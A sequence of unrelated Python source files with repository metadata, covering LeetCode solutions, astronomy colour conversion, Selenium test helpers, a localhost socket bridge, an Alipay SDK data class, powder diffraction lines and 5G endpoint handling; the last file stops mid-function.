def sortArrayByParity(self, nums: List[int]) -> List[int]:
l = []
r = []
for x in nums:
if x % 2 == 0:
l.append(x)
else:
r.append(x)
return l + r | weastur/leetcode | 941-sort-array-by-parity/main.py | main.py | py | 253 | python | en | code | 0 | github-code | 13 |
37862132113 | import numpy as np
from PyAstronomy.pyaC import pyaErrors as PE
class BallesterosBV_T:
"""
Black-body based conversion between effective temperature and B-V color.
Ballesteros 2012 (EPL 97, 34008) present a conversion between
effective temperature and B-V color index based on a black body
spectrum and the filter functions.
"""
def __init__(self):
self._a = 0.92
self._b = 1.7
self._c = 0.62
self._T0 = 4600.0
def bv2T(self, bv):
"""
Convert B-V color into temperature.
Parameters
----------
bv : float
B-V color index [mag]
Returns
-------
T : float
Temperature [K]
"""
T = self._T0*(1.0/(self._a*bv + self._b) + 1.0/(self._a*bv + self._c))
return T
def t2bv(self, T):
"""
Convert temperature into B-V color.
Parameters
----------
T : float
Temperature in K.
Returns
-------
bv : float
B-V color index [mag].
"""
z = T/self._T0
ap = z*self._a**2
bp = self._a*self._c*z + self._b*self._a*z - 2.0*self._a
cp = self._b*self._c*z -self._c - self._b
sqrtarg = bp**2 - 4.0*ap*cp
# By comparison with a BB it can be verified that
# the physical solution is this one
bv1 = (-bp + np.sqrt(sqrtarg))/(2.0*ap)
return bv1
def bv2T_Ballesteros(bv):
b = BallesterosBV_T()
return b.bv2T(bv)
bv2T_Ballesteros.__doc__ = BallesterosBV_T.bv2T.__doc__
def t2bv_Ballesteros(T):
b = BallesterosBV_T()
return b.t2bv(T)
t2bv_Ballesteros.__doc__ = BallesterosBV_T.t2bv.__doc__ | sczesla/PyAstronomy | src/pyasl/asl/aslExt_1/ballesterosBV_T.py | ballesterosBV_T.py | py | 1,647 | python | en | code | 134 | github-code | 13 |
40242623492 | '''
lets say we have 2 arrays a1 = [a,b] and a2 = [c,d]
Intervals can be merged if a1[0] < a2[0] => this is acheived by sorting the intervals
Intervals can be merged if a2[0] < a1[1]
'''
class Solution:
def merge(self, intervals):
intervals.sort(key =lambda x: x[0])
merged = []
for i in intervals:
# if the list of merged intervals is empty
# or if the current interval does not overlap with the previous,
# simply append it.
if not merged or merged[-1][-1] < i[0]:
merged.append(i)
# otherwise, there is overlap,
#so we merge the current and previous intervals.
else:
merged[-1][-1] = max(merged[-1][-1], i[-1])
print(merged)
return merged
if __name__ == '__main__':
s = Solution()
intervals = [[1, 3], [2, 6], [8, 10], [15, 18]]
intervals = [[1, 5], [2, 3], [4, 8], [9, 10]]
print(s.merge(intervals)) | ltoco/DSA | merge_intervals.py | merge_intervals.py | py | 986 | python | en | code | 0 | github-code | 13 |
27227523674 | from model.contact import Contact
import re
class ContactHelper:
def __init__(self, app):
self.app = app
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def fill_contact_form(self, contact):
self.change_field_value("firstname", contact.firstname)
self.change_field_value("middlename", contact.middlename)
self.change_field_value("lastname", contact.lastname)
self.change_field_value("nickname", contact.nickname)
self.change_field_value("company", contact.company)
self.change_field_value("address", contact.address)
self.change_field_value("home", contact.homephone)
self.change_field_value("mobile", contact.mobilephone)
self.change_field_value("work", contact.workphone)
self.change_field_value("fax", contact.fax)
self.change_field_value("email", contact.email)
def create(self, contact):
wd = self.app.wd
wd.find_element_by_xpath("/html/body/div/div[3]/ul/li[2]/a").click()
self.fill_contact_form(contact)
wd.find_element_by_name("submit").click()
self.app.return_home()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def delete_contact_by_index(self, index):
wd = self.app.wd
self.select_contact_by_index(index)
wd.find_element_by_xpath("/html/body/div/div[4]/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def select_contact_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def modify_contact_by_index(self, index, contact):
wd = self.app.wd
self.select_contact_by_index(index)
wd.find_element_by_css_selector('img[alt="Edit"]').click()
self.fill_contact_form(contact)
wd.find_element_by_name("update").click()
self.app.return_home()
self.contact_cache = None
def count(self):
wd = self.app.wd
self.app.return_home()
return len(wd.find_elements_by_name("selected[]"))
def open_add_contact_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/edit.php") and len(wd.find_elements_by_name("photo")) > 0):
wd.find_element_by_link_text("add new").click()
contact_cache = None
@property
def get_contacts_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.app.open_home_page()
self.contact_cache = []
for row in wd.find_elements_by_name("entry"):
cells = row.find_elements_by_tag_name("td")
lastname = cells[1].text
firstname = cells[2].text
id = cells[0].find_element_by_tag_name("input").get_attribute("value")
all_phones = cells[5].text
self.contact_cache.append(Contact(lastname=lastname, firstname=firstname, id=id,
all_phones_from_home_page=all_phones))
return list(self.contact_cache)
def open_contact_view_by_index(self, index):
wd = self.app.wd
self.app.open_home_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def open_contact_to_edit_by_index(self, index):
wd = self.app.wd
self.app.open_home_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def get_contact_info_from_edit_page(self, index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname = wd.find_element_by_name("firstname").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
id = wd.find_element_by_name("id").get_attribute("value")
homephone = wd.find_element_by_name("home").get_attribute("value")
workphone = wd.find_element_by_name("work").get_attribute("value")
mobilephone = wd.find_element_by_name("mobile").get_attribute("value")
return Contact(firstname=firstname, lastname=lastname, id=id, homephone=homephone, workphone=workphone, mobilephone=mobilephone)
def get_contacts_from_view_page(self, index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text = wd.find_element_by_id("content").text
homephone = re.search("H: (.*)", text).group(1)
workphone = re.search("W: (.*)", text).group(1)
mobilephone = re.search("M: (.*)", text).group(1)
return Contact(homephone=homephone, mobilephone=mobilephone,
workphone=workphone) | AlexGraf71/test_python | fixture/contact.py | contact.py | py | 5,085 | python | en | code | 0 | github-code | 13 |
29187517042 | # Using sockets to transfer data between Ren'Py and MASM
# TODO: Ping-Pong alive check messages
import json
import time
import socket
import threading
class MASM:
data = {}
commThread = None
serverSocket = None
commRun = threading.Event()
commLock = threading.Lock()
@staticmethod
def _startThread():
MASM._connectMAS()
MASM.commThread = threading.Thread(target = MASM._receiveData)
MASM.commThread.start()
@staticmethod
def _stopAll():
MASM.commRun.set()
MASM.commThread.join()
MASM.serverSocket.close()
@staticmethod
def _connectMAS():
if MASM.serverSocket is None:
try:
print("Creating server socket..", end=" ")
MASM.serverSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
MASM.serverSocket.settimeout(0.1)
MASM.serverSocket.bind(("127.0.0.1", 24489))
print("Done")
print("Sending ready message..", end=" ")
MASM.sendData("MASM_READY", True)
print("Done")
except Exception as e:
print(f"Creating socket exception: {e}")
@staticmethod
def _receiveData():
while not MASM.commRun.is_set():
try:
recv, addr = MASM.serverSocket.recvfrom(256)
if recv is not None:
recv = json.loads(recv.decode("utf-8"))
print(f"Received: {recv}")
if recv[0] == "ping":
MASM.sendData("pong")
else:
with MASM.commLock:
MASM.data[recv[0]] = recv[1]
except socket.timeout:
time.sleep(0) # Yield thread
continue # No data
except socket.error as e:
print(f"Socket receive error: {e}") # Log but pass
except Exception as e:
print(f"Socketer socket exception: {e}")
@staticmethod
def sendData(sendKey, sendValue = True):
if MASM.serverSocket is not None:
#print(f"Sending: {sendKey}")
MASM.serverSocket.sendto(json.dumps((sendKey, sendValue)).encode("utf-8"), ("127.0.0.1", 24488))
@staticmethod
def hasDataWith(dictKey):
res = None
with MASM.commLock:
try:
res = next(((k, v) for k, v in MASM.data.items() if k.startswith(dictKey)), None)
if res[0] is not None:
del MASM.data[res[0]]
except:
res = (None, None)
return res
@staticmethod
def hasDataValue(dictKey, defaultValue = None):
res = defaultValue
with MASM.commLock:
got = MASM.data.get(dictKey, None)
if got is not None:
res = got
del MASM.data[dictKey]
return res
@staticmethod
def hasDataBool(dictKey):
res = False
with MASM.commLock:
if dictKey in MASM.data:
res = True
del MASM.data[dictKey]
return res
@staticmethod
def hasDataCheck(dictKey, expectedType = None):
res = False
with MASM.commLock:
val = MASM.data.get(dictKey, None)
if val is not None and (expectedType is None or type(val) is expectedType):
res = True
return res
def Start():
MASM._startThread()
def OnQuit():
MASM._stopAll() | DatCaptainHorse/MAS-Additions | Submods/MAS Additions/MASM/scripts/socketer.py | socketer.py | py | 2,797 | python | en | code | 17 | github-code | 13 |
43254452311 | # import sys
#
# sys.stdin = open('김병완_2579_계단오르기.txt', 'r')
#
N = int(input())
# stair = []
# for i in range(N):
# stair.append(int(input()))
#
# dp = []
# dp.append(stair[0])
# dp.append(max(stair[0] + stair[1], stair[1]))
# dp.append(max(stair[0] + stair[2], stair[1] + stair[2]))
#
# for j in range(3, N):
# dp.append(max(dp[j - 3] + stair[j] + stair[j - 1], dp[j - 2] + stair[j]))
#
# print(dp[-1])
stair = [0] * (N + 3)
dp = [0] * (N + 3)
for i in range(N):
stair[i] = int(input())
dp[0] = stair[0]
dp[1] = stair[0] + stair[1]
dp[2] = max(stair[1] + stair[2], stair[0] + stair[2])
for i in range(3, N):
dp[i] = max(dp[i - 3] + stair[i - 1] + stair[i], dp[i - 2] + stair[i])
print(dp[N - 1])
| KimSoomae/Algoshipda | week2(dp)/0915WED/김병완_2579_계단오르기_S3.py | 김병완_2579_계단오르기_S3.py | py | 736 | python | en | code | 0 | github-code | 13 |
17061306394 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class VehModelDto(object):
def __init__(self):
self._acid = None
self._body_type = None
self._brand_id = None
self._brand_logo_url = None
self._brand_name = None
self._car_type = None
self._cylinder_arrangement = None
self._cylinders_num = None
self._displacement = None
self._doors_num = None
self._drive_mode = None
self._emission_standard = None
self._fuel_injection = None
self._fuel_type = None
self._horsepower = None
self._intake = None
self._manufacturer_id = None
self._manufacturer_name = None
self._power_kw = None
self._power_rpm = None
self._price = None
self._sale_name = None
self._sale_years = None
self._seat_num = None
self._series_id = None
self._series_image_url = None
self._series_name = None
self._show_name = None
self._torque_nm = None
self._torque_rpm = None
self._transmission = None
self._transmission_type = None
self._vehicle_size = None
self._vehicle_type = None
@property
def acid(self):
return self._acid
@acid.setter
def acid(self, value):
self._acid = value
@property
def body_type(self):
return self._body_type
@body_type.setter
def body_type(self, value):
self._body_type = value
@property
def brand_id(self):
return self._brand_id
@brand_id.setter
def brand_id(self, value):
self._brand_id = value
@property
def brand_logo_url(self):
return self._brand_logo_url
@brand_logo_url.setter
def brand_logo_url(self, value):
self._brand_logo_url = value
@property
def brand_name(self):
return self._brand_name
@brand_name.setter
def brand_name(self, value):
self._brand_name = value
@property
def car_type(self):
return self._car_type
@car_type.setter
def car_type(self, value):
self._car_type = value
@property
def cylinder_arrangement(self):
return self._cylinder_arrangement
@cylinder_arrangement.setter
def cylinder_arrangement(self, value):
self._cylinder_arrangement = value
@property
def cylinders_num(self):
return self._cylinders_num
@cylinders_num.setter
def cylinders_num(self, value):
self._cylinders_num = value
@property
def displacement(self):
return self._displacement
@displacement.setter
def displacement(self, value):
self._displacement = value
@property
def doors_num(self):
return self._doors_num
@doors_num.setter
def doors_num(self, value):
self._doors_num = value
@property
def drive_mode(self):
return self._drive_mode
@drive_mode.setter
def drive_mode(self, value):
self._drive_mode = value
@property
def emission_standard(self):
return self._emission_standard
@emission_standard.setter
def emission_standard(self, value):
self._emission_standard = value
@property
def fuel_injection(self):
return self._fuel_injection
@fuel_injection.setter
def fuel_injection(self, value):
self._fuel_injection = value
@property
def fuel_type(self):
return self._fuel_type
@fuel_type.setter
def fuel_type(self, value):
self._fuel_type = value
@property
def horsepower(self):
return self._horsepower
@horsepower.setter
def horsepower(self, value):
self._horsepower = value
@property
def intake(self):
return self._intake
@intake.setter
def intake(self, value):
self._intake = value
@property
def manufacturer_id(self):
return self._manufacturer_id
@manufacturer_id.setter
def manufacturer_id(self, value):
self._manufacturer_id = value
@property
def manufacturer_name(self):
return self._manufacturer_name
@manufacturer_name.setter
def manufacturer_name(self, value):
self._manufacturer_name = value
@property
def power_kw(self):
return self._power_kw
@power_kw.setter
def power_kw(self, value):
self._power_kw = value
@property
def power_rpm(self):
return self._power_rpm
@power_rpm.setter
def power_rpm(self, value):
self._power_rpm = value
@property
def price(self):
return self._price
@price.setter
def price(self, value):
self._price = value
@property
def sale_name(self):
return self._sale_name
@sale_name.setter
def sale_name(self, value):
self._sale_name = value
@property
def sale_years(self):
return self._sale_years
@sale_years.setter
def sale_years(self, value):
self._sale_years = value
@property
def seat_num(self):
return self._seat_num
@seat_num.setter
def seat_num(self, value):
self._seat_num = value
@property
def series_id(self):
return self._series_id
@series_id.setter
def series_id(self, value):
self._series_id = value
@property
def series_image_url(self):
return self._series_image_url
@series_image_url.setter
def series_image_url(self, value):
self._series_image_url = value
@property
def series_name(self):
return self._series_name
@series_name.setter
def series_name(self, value):
self._series_name = value
@property
def show_name(self):
return self._show_name
@show_name.setter
def show_name(self, value):
self._show_name = value
@property
def torque_nm(self):
return self._torque_nm
@torque_nm.setter
def torque_nm(self, value):
self._torque_nm = value
@property
def torque_rpm(self):
return self._torque_rpm
@torque_rpm.setter
def torque_rpm(self, value):
self._torque_rpm = value
@property
def transmission(self):
return self._transmission
@transmission.setter
def transmission(self, value):
self._transmission = value
@property
def transmission_type(self):
return self._transmission_type
@transmission_type.setter
def transmission_type(self, value):
self._transmission_type = value
@property
def vehicle_size(self):
return self._vehicle_size
@vehicle_size.setter
def vehicle_size(self, value):
self._vehicle_size = value
@property
def vehicle_type(self):
return self._vehicle_type
@vehicle_type.setter
def vehicle_type(self, value):
self._vehicle_type = value
def to_alipay_dict(self):
params = dict()
if self.acid:
if hasattr(self.acid, 'to_alipay_dict'):
params['acid'] = self.acid.to_alipay_dict()
else:
params['acid'] = self.acid
if self.body_type:
if hasattr(self.body_type, 'to_alipay_dict'):
params['body_type'] = self.body_type.to_alipay_dict()
else:
params['body_type'] = self.body_type
if self.brand_id:
if hasattr(self.brand_id, 'to_alipay_dict'):
params['brand_id'] = self.brand_id.to_alipay_dict()
else:
params['brand_id'] = self.brand_id
if self.brand_logo_url:
if hasattr(self.brand_logo_url, 'to_alipay_dict'):
params['brand_logo_url'] = self.brand_logo_url.to_alipay_dict()
else:
params['brand_logo_url'] = self.brand_logo_url
if self.brand_name:
if hasattr(self.brand_name, 'to_alipay_dict'):
params['brand_name'] = self.brand_name.to_alipay_dict()
else:
params['brand_name'] = self.brand_name
if self.car_type:
if hasattr(self.car_type, 'to_alipay_dict'):
params['car_type'] = self.car_type.to_alipay_dict()
else:
params['car_type'] = self.car_type
if self.cylinder_arrangement:
if hasattr(self.cylinder_arrangement, 'to_alipay_dict'):
params['cylinder_arrangement'] = self.cylinder_arrangement.to_alipay_dict()
else:
params['cylinder_arrangement'] = self.cylinder_arrangement
if self.cylinders_num:
if hasattr(self.cylinders_num, 'to_alipay_dict'):
params['cylinders_num'] = self.cylinders_num.to_alipay_dict()
else:
params['cylinders_num'] = self.cylinders_num
if self.displacement:
if hasattr(self.displacement, 'to_alipay_dict'):
params['displacement'] = self.displacement.to_alipay_dict()
else:
params['displacement'] = self.displacement
if self.doors_num:
if hasattr(self.doors_num, 'to_alipay_dict'):
params['doors_num'] = self.doors_num.to_alipay_dict()
else:
params['doors_num'] = self.doors_num
if self.drive_mode:
if hasattr(self.drive_mode, 'to_alipay_dict'):
params['drive_mode'] = self.drive_mode.to_alipay_dict()
else:
params['drive_mode'] = self.drive_mode
if self.emission_standard:
if hasattr(self.emission_standard, 'to_alipay_dict'):
params['emission_standard'] = self.emission_standard.to_alipay_dict()
else:
params['emission_standard'] = self.emission_standard
if self.fuel_injection:
if hasattr(self.fuel_injection, 'to_alipay_dict'):
params['fuel_injection'] = self.fuel_injection.to_alipay_dict()
else:
params['fuel_injection'] = self.fuel_injection
if self.fuel_type:
if hasattr(self.fuel_type, 'to_alipay_dict'):
params['fuel_type'] = self.fuel_type.to_alipay_dict()
else:
params['fuel_type'] = self.fuel_type
if self.horsepower:
if hasattr(self.horsepower, 'to_alipay_dict'):
params['horsepower'] = self.horsepower.to_alipay_dict()
else:
params['horsepower'] = self.horsepower
if self.intake:
if hasattr(self.intake, 'to_alipay_dict'):
params['intake'] = self.intake.to_alipay_dict()
else:
params['intake'] = self.intake
if self.manufacturer_id:
if hasattr(self.manufacturer_id, 'to_alipay_dict'):
params['manufacturer_id'] = self.manufacturer_id.to_alipay_dict()
else:
params['manufacturer_id'] = self.manufacturer_id
if self.manufacturer_name:
if hasattr(self.manufacturer_name, 'to_alipay_dict'):
params['manufacturer_name'] = self.manufacturer_name.to_alipay_dict()
else:
params['manufacturer_name'] = self.manufacturer_name
if self.power_kw:
if hasattr(self.power_kw, 'to_alipay_dict'):
params['power_kw'] = self.power_kw.to_alipay_dict()
else:
params['power_kw'] = self.power_kw
if self.power_rpm:
if hasattr(self.power_rpm, 'to_alipay_dict'):
params['power_rpm'] = self.power_rpm.to_alipay_dict()
else:
params['power_rpm'] = self.power_rpm
if self.price:
if hasattr(self.price, 'to_alipay_dict'):
params['price'] = self.price.to_alipay_dict()
else:
params['price'] = self.price
if self.sale_name:
if hasattr(self.sale_name, 'to_alipay_dict'):
params['sale_name'] = self.sale_name.to_alipay_dict()
else:
params['sale_name'] = self.sale_name
if self.sale_years:
if hasattr(self.sale_years, 'to_alipay_dict'):
params['sale_years'] = self.sale_years.to_alipay_dict()
else:
params['sale_years'] = self.sale_years
if self.seat_num:
if hasattr(self.seat_num, 'to_alipay_dict'):
params['seat_num'] = self.seat_num.to_alipay_dict()
else:
params['seat_num'] = self.seat_num
if self.series_id:
if hasattr(self.series_id, 'to_alipay_dict'):
params['series_id'] = self.series_id.to_alipay_dict()
else:
params['series_id'] = self.series_id
if self.series_image_url:
if hasattr(self.series_image_url, 'to_alipay_dict'):
params['series_image_url'] = self.series_image_url.to_alipay_dict()
else:
params['series_image_url'] = self.series_image_url
if self.series_name:
if hasattr(self.series_name, 'to_alipay_dict'):
params['series_name'] = self.series_name.to_alipay_dict()
else:
params['series_name'] = self.series_name
if self.show_name:
if hasattr(self.show_name, 'to_alipay_dict'):
params['show_name'] = self.show_name.to_alipay_dict()
else:
params['show_name'] = self.show_name
if self.torque_nm:
if hasattr(self.torque_nm, 'to_alipay_dict'):
params['torque_nm'] = self.torque_nm.to_alipay_dict()
else:
params['torque_nm'] = self.torque_nm
if self.torque_rpm:
if hasattr(self.torque_rpm, 'to_alipay_dict'):
params['torque_rpm'] = self.torque_rpm.to_alipay_dict()
else:
params['torque_rpm'] = self.torque_rpm
if self.transmission:
if hasattr(self.transmission, 'to_alipay_dict'):
params['transmission'] = self.transmission.to_alipay_dict()
else:
params['transmission'] = self.transmission
if self.transmission_type:
if hasattr(self.transmission_type, 'to_alipay_dict'):
params['transmission_type'] = self.transmission_type.to_alipay_dict()
else:
params['transmission_type'] = self.transmission_type
if self.vehicle_size:
if hasattr(self.vehicle_size, 'to_alipay_dict'):
params['vehicle_size'] = self.vehicle_size.to_alipay_dict()
else:
params['vehicle_size'] = self.vehicle_size
if self.vehicle_type:
if hasattr(self.vehicle_type, 'to_alipay_dict'):
params['vehicle_type'] = self.vehicle_type.to_alipay_dict()
else:
params['vehicle_type'] = self.vehicle_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = VehModelDto()
if 'acid' in d:
o.acid = d['acid']
if 'body_type' in d:
o.body_type = d['body_type']
if 'brand_id' in d:
o.brand_id = d['brand_id']
if 'brand_logo_url' in d:
o.brand_logo_url = d['brand_logo_url']
if 'brand_name' in d:
o.brand_name = d['brand_name']
if 'car_type' in d:
o.car_type = d['car_type']
if 'cylinder_arrangement' in d:
o.cylinder_arrangement = d['cylinder_arrangement']
if 'cylinders_num' in d:
o.cylinders_num = d['cylinders_num']
if 'displacement' in d:
o.displacement = d['displacement']
if 'doors_num' in d:
o.doors_num = d['doors_num']
if 'drive_mode' in d:
o.drive_mode = d['drive_mode']
if 'emission_standard' in d:
o.emission_standard = d['emission_standard']
if 'fuel_injection' in d:
o.fuel_injection = d['fuel_injection']
if 'fuel_type' in d:
o.fuel_type = d['fuel_type']
if 'horsepower' in d:
o.horsepower = d['horsepower']
if 'intake' in d:
o.intake = d['intake']
if 'manufacturer_id' in d:
o.manufacturer_id = d['manufacturer_id']
if 'manufacturer_name' in d:
o.manufacturer_name = d['manufacturer_name']
if 'power_kw' in d:
o.power_kw = d['power_kw']
if 'power_rpm' in d:
o.power_rpm = d['power_rpm']
if 'price' in d:
o.price = d['price']
if 'sale_name' in d:
o.sale_name = d['sale_name']
if 'sale_years' in d:
o.sale_years = d['sale_years']
if 'seat_num' in d:
o.seat_num = d['seat_num']
if 'series_id' in d:
o.series_id = d['series_id']
if 'series_image_url' in d:
o.series_image_url = d['series_image_url']
if 'series_name' in d:
o.series_name = d['series_name']
if 'show_name' in d:
o.show_name = d['show_name']
if 'torque_nm' in d:
o.torque_nm = d['torque_nm']
if 'torque_rpm' in d:
o.torque_rpm = d['torque_rpm']
if 'transmission' in d:
o.transmission = d['transmission']
if 'transmission_type' in d:
o.transmission_type = d['transmission_type']
if 'vehicle_size' in d:
o.vehicle_size = d['vehicle_size']
if 'vehicle_type' in d:
o.vehicle_type = d['vehicle_type']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/VehModelDto.py | VehModelDto.py | py | 17,811 | python | en | code | 241 | github-code | 13 |
5661290639 | import numpy as np
from scipy import constants
from mantid.geometry import CrystalStructure, ReflectionGenerator, ReflectionConditionFilter
from mslice.models.labels import is_momentum, is_twotheta
from mslice.models.workspacemanager.workspace_provider import get_workspace_handle
from mslice.util.mantid.mantid_algorithms import LoadCIF
# energy to wavelength conversion E = h^2/(2*m_n*l^2)
E2L = 1.e23 * constants.h ** 2 / (2 * constants.m_n * constants.e)
crystal_structure = {'Copper': ['3.6149 3.6149 3.6149', 'F m -3 m', 'Cu 0 0 0 1.0 0.05'],
'Aluminium': ['4.0495 4.0495 4.0495', 'F m -3 m', 'Al 0 0 0 1.0 0.05'],
'Niobium': ['3.3004 3.3004 3.3004', 'I m -3 m', 'Nb 0 0 0 1.0 0.05'],
'Tantalum': ['3.3013 3.3013 3.3013', 'I m -3 m', 'Ta 0 0 0 1.0 0.05']}
def compute_dvalues(d_min, d_max, structure):
generator = ReflectionGenerator(structure)
hkls = generator.getUniqueHKLsUsingFilter(d_min, d_max,
ReflectionConditionFilter.StructureFactor)
dvalues = np.sort(np.array(generator.getDValues(hkls)))[::-1]
return dvalues
def _compute_powder_line_momentum(ws_name, q_axis, element, cif_file):
two_pi = 2.0 * np.pi
d_min = two_pi / q_axis.end
d_max = two_pi / np.max([q_axis.start, 0.01])
structure = _crystal_structure(ws_name, element, cif_file)
dvalues = compute_dvalues(d_min, d_max, structure)
x = two_pi / dvalues
return x
def _compute_powder_line_degrees(ws_name, theta_axis, element, efixed, cif_file):
wavelength = np.sqrt(E2L / efixed)
d_min = wavelength / (2 * np.sin(np.deg2rad(theta_axis.end * 0.5)))
d_max = wavelength / (2 * np.sin(np.deg2rad(theta_axis.start * 0.5)))
structure = _crystal_structure(ws_name, element, cif_file)
dvalues = compute_dvalues(d_min, d_max, structure)
x = 2 * np.arcsin(wavelength / 2 / dvalues) * 180 / np.pi
return x
def compute_powder_line(ws_name, axis, element, cif_file=False):
efixed = get_workspace_handle(ws_name).e_fixed
if is_momentum(axis.units):
x0 = _compute_powder_line_momentum(ws_name, axis, element, cif_file)
elif is_twotheta(axis.units):
x0 = _compute_powder_line_degrees(ws_name, axis, element, efixed, cif_file)
else:
raise RuntimeError("units of axis not recognised")
x = sum([[xv, xv, np.nan] for xv in x0], [])
y = sum([[efixed / 20, -efixed / 20, np.nan] for xv in x0], [])
return x, y
def _crystal_structure(ws_name, element, cif_file):
if cif_file:
ws = get_workspace_handle(ws_name).raw_ws
LoadCIF(Workspace=ws, InputFile=cif_file)
return ws.sample().getCrystalStructure()
else:
return CrystalStructure(*crystal_structure[element])
| mantidproject/mslice | src/mslice/models/powder/powder_functions.py | powder_functions.py | py | 2,795 | python | en | code | 1 | github-code | 13 |
43356236537 | data = input()
result = int(data[0])
for i in range(1, len(data)):
num = int(data[i])
if result <= 1 or num <= 1: # 두 수 중 하나라도 1 이하의 수라면 더하기 수행
result += num
else:
result *= num
print(result)
| tr0up2r/coding-test | greedy_algorithms/023_mul_or_add.py | 023_mul_or_add.py | py | 259 | python | ko | code | 0 | github-code | 13 |
31418984932 | #
#
# Copyright (C) University of Melbourne 2012
#
#
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#
#
"""Performs a basic regression test on the
directory provided, for the ge demo code.
It checks simply that the
final results are in agreement, and if not, writes
both of the 'all_years_out' structures out to the
file diff.txt. The run log is at test.log.
This is written to be called from the test.py files
in the subdirectories.
"""
import sys
sys.path.append('..')
import os
import rungedemo
import pickle
import pprint
def ge_test(file_dir, config_name, pickle_name, data_file):
cwd = os.getcwd()
os.chdir(file_dir)
config_file = config_name
pickle_file = pickle_name
new_pickle_file = 'test_out.pkl'
new_log_file = 'test.log'
new_diff_file = 'diff.txt'
if os.path.isfile(new_pickle_file):
os.remove(new_pickle_file)
if os.path.isfile(new_log_file):
os.remove(new_log_file)
if os.path.isfile(new_diff_file):
os.remove(new_diff_file)
flags = ['-f', config_file,
'-l', new_log_file, '-d', 'DEBUG']
with open(data_file) as f:
input_data = f.read()
all_years_out = rungedemo.rungedemo(flags, input_data)
pickle.dump(all_years_out, open(new_pickle_file, "wb"))
if os.path.isfile(new_pickle_file):
exp_result = pickle.load(open(pickle_file, 'rb'))
new_result = pickle.load(open(new_pickle_file, 'rb'))
match = (exp_result == new_result)
if not match:
f = open(file_dir + '/' + 'diff.txt', 'w')
pp = pprint.PrettyPrinter(indent=4, stream=f)
f.write('Expected results\n')
f.write('=======================\n')
pp.pprint(exp_result)
f.write('This run results\n')
f.write('=======================\n')
pp.pprint(new_result)
f.close()
else:
match = False
os.chdir(cwd)
return match
| zarppy/MUREIL_2014 | test_regression/ge_test.py | ge_test.py | py | 3,072 | python | en | code | 0 | github-code | 13 |
32799560271 | import os
from python.request.endpoint.EndpointUtils import EndpointType
from python.utils import ConfigUtils
# Class handling the creation of Endpoint objects
# In particular, it manages the corresponding urls depending on each endpoint type
class EndPointGenerator:
def __init__(self, flask_port):
self.endpoints = []
self.num_location_ep = 0
self.num_gbr_ep = 0
self.flask_port = flask_port
# Call me to create an endpoint dedicated to communication with 5G components (ex: the NEF emulator)
def create_5gcore_endpoint(self, func, type_endpoint):
if type_endpoint == EndpointType.UE_LOCATION:
endpoint = CustomEndpoint(type_endpoint, "/monitoring/loc" + str(self.num_location_ep),
['POST'], func, self.flask_port)
self.num_location_ep += 1
elif type_endpoint == EndpointType.UE_GBR:
endpoint = CustomEndpoint(type_endpoint, "/monitoring/gbr" + str(self.num_gbr_ep),
['POST'], func, self.flask_port)
self.num_gbr_ep += 1
else:
raise NameError('Unknown endpoint type id ' + str(type_endpoint))
self.endpoints.append(endpoint)
return endpoint
def create_web_endpoint(self, url, func):
endpoint = CustomEndpoint(EndpointType.WEB, url, ['GET'], func, self.flask_port)
self.endpoints.append(endpoint)
return endpoint
class CustomEndpoint:
def __init__(self, type_ep, url_rule, methods, func, flask_port):
self.type_ep = type_ep
self.url_rule = url_rule
self.methods = methods
self.func = func
# Read the config file to get the first part of the endpoint url
self.complete_url = os.getenv('NEF_CALLBACK_URL') + str(flask_port) + self.url_rule
| EVOLVED-5G/ImmersionNetApp | src/python/request/endpoint/EndPointGenerator.py | EndPointGenerator.py | py | 1,904 | python | en | code | 0 | github-code | 13 |
22787953051 | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
# 递归超时
class Solution(object):
def rob(self, root):
if root is None:
return 0
left_sum = 0
if root.left is not None:
left = root.left
left_sum = self.rob(left.left) + self.rob(left.right)
right_sum = 0
if root.right is not None:
right = root.right
right_sum = self.rob(right.left) + self.rob(right.right)
return max(root.val + right_sum + left_sum, self.rob(root.left) + self.rob(root.right))
# 添加一个visited记录已访问顶点
class Solution2(object):
def __init__(self):
self.visited = {}
def rob(self, root):
if root in self.visited:
return self.visited[root]
if root is None:
return 0
left_sun_sum = 0
if root.left is not None:
left = root.left
left_sun_sum = self.rob(left.left) + self.rob(left.right)
right_sun_sum = 0
if root.right is not None:
right = root.right
